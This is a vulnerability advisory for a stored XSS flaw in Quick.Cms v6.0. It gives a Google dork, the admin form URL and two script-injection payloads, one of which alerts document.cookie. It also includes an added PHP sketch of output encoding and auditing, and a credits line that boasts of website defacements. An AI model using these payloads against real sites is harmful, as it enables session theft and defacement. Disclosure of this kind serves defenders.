
QUICK.CMS Stored XSS Vulnerability

Author: Oussama911, Published: 10-01-2015
#######################################################################################
# Exploit Title: QUICK.CMS Stored XSS Vulnerability
# Date: 03-01-2015
# Google Dork : Quick.Cms v6.0
# Exploit Author: Oussama911
# Version: v6.0
# Vendor Homepage: http://www.opensolution.org/
# Tested on: OWASP Mantra & Iceweasel
# Greetz : Toxic Dz - Dz Mafia - Anonymous Algeria - Virus28 Team - Djamel11154 - Russi173Oox
# Contact : fb.me/ouss911algerianhacker
# contact team : fb.me/teamvirus28
# Vulnerability Description:

Quick.Cms v6.0 is vulnerable to stored XSS. XSS payloads can be stored through the new page section.

XSS Vulnerability #1:

Go to the add new page form:

"http://{target-url}/admin.php?p=pages-form"

Set the content name value to:

"><script>alert(String.fromCharCode(48, 120, 57, 55))</script>

or

"><script>alert(document.cookie)</script>
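
Mitigation sketch (added example, not Quick.Cms source code and not part of the original advisory): the leading `">` in both payloads suggests the stored name is echoed inside a double-quoted HTML attribute, which is an assumption here. The function names and the `page_name` field are hypothetical; the block shows the unescaped output pattern beside the encoded one, plus a check for auditing names already stored.

```php
<?php
// Added example. Hypothetical names throughout; assumes the page name is
// rendered back into a double-quoted attribute of a form field.

// Defense in depth for the document.cookie payload: keep the session
// cookie out of reach of scripts.
ini_set('session.cookie_httponly', '1');

// Vulnerable pattern: the stored value is concatenated as-is, so a leading
// "> closes the attribute and the tag, and the rest is parsed as markup.
function render_name_field_unsafe(string $storedName): string
{
    return '<input type="text" name="page_name" value="' . $storedName . '" />';
}

// Encode for the HTML context at output time. ENT_QUOTES covers both quote
// styles; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: same markup, encoded value.
function render_name_field_safe(string $storedName): string
{
    return '<input type="text" name="page_name" value="' . e($storedName) . '" />';
}

// Audit helper for rows saved before the fix: flag names that contain tags
// or characters able to break out of an attribute.
function looks_like_markup(string $storedName): bool
{
    return $storedName !== strip_tags($storedName)
        || strpbrk($storedName, '"<>') !== false;
}

// Constructed sample input: one benign name and one payload from the advisory.
$samples = [
    'About us',
    '"><script>alert(document.cookie)</script>',
];

foreach ($samples as $name) {
    printf(
        "stored: %s\nunsafe: %s\nsafe:   %s\naudit:  %s\n\n",
        $name,
        render_name_field_unsafe($name),
        render_name_field_safe($name),
        looks_like_markup($name) ? 'review' : 'ok'
    );
}
```

Encoding has to be applied at every place the stored name is printed, not only in the form that accepts it.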


========
Credits:
========

Vulnerability found and advisory written by Oussama911 ( Virus28 Team )

# 1000 website on zone-h it is not like a 1 exploit at www.exploit4arab.net ^_^

#######################################################################################
